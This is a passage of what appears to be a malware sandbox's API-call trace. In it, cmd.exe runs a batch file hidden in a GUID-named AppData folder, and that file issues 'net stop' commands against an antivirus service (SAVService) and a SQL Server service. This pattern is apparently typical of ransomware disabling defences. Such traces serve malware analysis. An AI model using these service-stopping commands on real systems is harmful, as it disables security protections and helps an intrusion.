lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.169] GetProcessHeap () returned 0x3e0000 [0039.169] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0039.169] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0039.169] GetProcessHeap () returned 0x3e0000 [0039.169] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0039.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.169] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.169] GetLastError () returned 0x2 [0039.169] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.169] GetLastError () returned 0x2 [0039.169] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0039.169] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0039.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.169] GetLastError () returned 0x2 [0039.169] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0039.170] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0039.170] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.170] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0039.170] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0039.170] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0039.170] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.170] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop SAVService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop SAVService /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop SAVService /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xbe4, dwThreadId=0xbe8)) returned 1 [0039.173] CloseHandle (hObject=0x78) returned 1 [0039.174] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.174] GetProcessHeap () returned 0x3e0000 [0039.174] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.174] GetEnvironmentStringsW () returned 0x3f8408* [0039.174] GetProcessHeap () returned 0x3e0000 [0039.174] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.174] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.174] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0039.323] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0039.323] CloseHandle (hObject=0x74) returned 1 [0039.323] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0039.323] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0039.323] GetProcessHeap () returned 0x3e0000 [0039.323] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.323] GetEnvironmentStringsW () returned 0x3f8408* [0039.323] GetProcessHeap () returned 0x3e0000 [0039.323] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.323] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.323] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.323] GetProcessHeap () returned 0x3e0000 [0039.323] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.323] GetEnvironmentStringsW () returned 0x3f8408* [0039.323] GetProcessHeap () returned 0x3e0000 [0039.323] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.324] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.324] GetProcessHeap () returned 0x3e0000 [0039.324] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0039.324] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0039.324] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.324] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0039.324] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.324] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0039.324] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.324] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0039.324] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.324] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0039.324] SetConsoleInputExeNameW () returned 0x1 [0039.325] GetConsoleOutputCP () returned 0x1b5 [0039.325] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0039.325] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.325] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0039.325] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0039.325] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.325] SetFilePointer (in: hFile=0x74, lDistanceToMove=1314, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x522 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0039.325] GetProcessHeap () returned 0x3e0000 [0039.325] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0039.326] GetProcessHeap () returned 0x3e0000 [0039.326] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0039.326] GetProcessHeap () returned 0x3e0000 [0039.326] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0039.326] GetProcessHeap () returned 0x3e0000 [0039.326] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0039.326] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.326] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x522 [0039.326] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x139f, lpOverlapped=0x0) returned 1 [0039.326] SetFilePointer (in: hFile=0x74, lDistanceToMove=1350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x546 [0039.326] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=36, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQLFDLauncher$TPSAMA /y\r\n\r\nerviceΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 36 [0039.326] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.326] GetFileType (hFile=0x74) returned 0x1 [0039.326] _get_osfhandle (_FileHandle=3) returned 0x74 [0039.326] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x546 [0039.326] GetProcessHeap () returned 0x3e0000 [0039.326] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fcad8 [0039.326] GetProcessHeap () returned 0x3e0000 [0039.326] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fcad8 | out: hHeap=0x3e0000) returned 1 [0039.327] _tell (_FileHandle=3) returned 1350 [0039.327] _close (_FileHandle=3) returned 0 [0039.327] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0039.327] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0039.327] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0039.327] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0039.327] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0039.327] _wcsicmp (_String1="net", _String2="CD") returned 11 [0039.327] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0039.327] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0039.327] _wcsicmp (_String1="net", _String2="REN") returned -4 [0039.327] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0039.327] _wcsicmp (_String1="net", _String2="SET") returned -5 [0039.327] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0039.327] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0039.327] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0039.327] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0039.327] _wcsicmp (_String1="net", _String2="MD") returned 1 [0039.327] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0039.327] _wcsicmp (_String1="net", _String2="RD") returned -4 [0039.327] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0039.327] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0039.327] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0039.327] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0039.327] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0039.327] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0039.327] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0039.327] _wcsicmp (_String1="net", _String2="VER") returned -8 [0039.328] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0039.328] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0039.328] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0039.328] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0039.328] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0039.328] _wcsicmp (_String1="net", _String2="START") returned -5 [0039.328] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0039.328] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0039.328] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0039.328] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0039.328] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0039.328] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0039.328] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0039.328] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0039.328] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0039.328] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0039.328] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0039.328] SetErrorMode (uMode=0x0) returned 0x1 [0039.328] GetProcessHeap () returned 0x3e0000 [0039.328] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0039.328] GetProcessHeap () returned 0x3e0000 [0039.328] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0039.328] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.328] GetProcessHeap () returned 0x3e0000 [0039.328] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0039.328] GetProcessHeap () returned 0x3e0000 [0039.328] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0039.328] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0039.328] GetProcessHeap () returned 0x3e0000 [0039.328] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0039.328] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.328] GetProcessHeap () returned 0x3e0000 [0039.329] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0039.329] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0039.329] GetProcessHeap () returned 0x3e0000 [0039.329] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0039.329] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.329] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.329] GetLastError () returned 0x2 [0039.329] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.329] GetLastError () returned 0x2 [0039.329] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.329] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0039.329] GetLastError () returned 0x2 [0039.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0039.330] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0039.330] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.330] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0039.330] SetErrorMode (uMode=0x0) returned 0x1 [0039.330] GetProcessHeap () returned 0x3e0000 [0039.330] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0039.330] GetProcessHeap () returned 0x3e0000 [0039.330] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0039.330] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0039.330] GetProcessHeap () returned 0x3e0000 [0039.330] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0039.330] GetProcessHeap () returned 0x3e0000 [0039.330] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0039.330] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0039.330] GetProcessHeap () returned 0x3e0000 [0039.330] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0039.330] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.330] GetProcessHeap () returned 0x3e0000 [0039.330] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0039.331] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0039.331] GetProcessHeap () returned 0x3e0000 [0039.331] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0039.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.331] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.331] GetLastError () returned 0x2 [0039.331] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.331] GetLastError () returned 0x2 [0039.331] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0039.331] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.331] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.331] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0039.331] GetLastError () returned 0x2 [0039.331] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0039.331] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0039.332] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.332] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0039.332] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0039.332] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0039.332] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0039.332] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop MSSQLFDLauncher$TPSAMA /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop MSSQLFDLauncher$TPSAMA /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop MSSQLFDLauncher$TPSAMA /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xbf4, dwThreadId=0xbf8)) returned 1 [0039.342] CloseHandle (hObject=0x74) returned 1 [0039.342] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0039.342] GetProcessHeap () returned 0x3e0000 [0039.342] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.342] GetEnvironmentStringsW () returned 0x3f8408* [0039.342] GetProcessHeap () returned 0x3e0000 [0039.342] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.342] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.342] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0039.493] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0039.493] CloseHandle (hObject=0x78) returned 1 [0039.493] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0039.493] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0039.493] GetProcessHeap () returned 0x3e0000 [0039.493] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.493] GetEnvironmentStringsW () returned 0x3f8408* [0039.493] GetProcessHeap () returned 0x3e0000 [0039.493] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.493] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.493] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0039.493] GetProcessHeap () returned 0x3e0000 [0039.493] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0039.493] GetEnvironmentStringsW () returned 0x3f8408* [0039.493] GetProcessHeap () returned 0x3e0000 [0039.493] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0039.493] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0039.494] GetProcessHeap () returned 0x3e0000 [0039.494] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0039.494] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0039.494] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.494] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0039.494] _get_osfhandle (_FileHandle=1) returned 0x264 [0039.494] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0039.494] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0039.494] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: 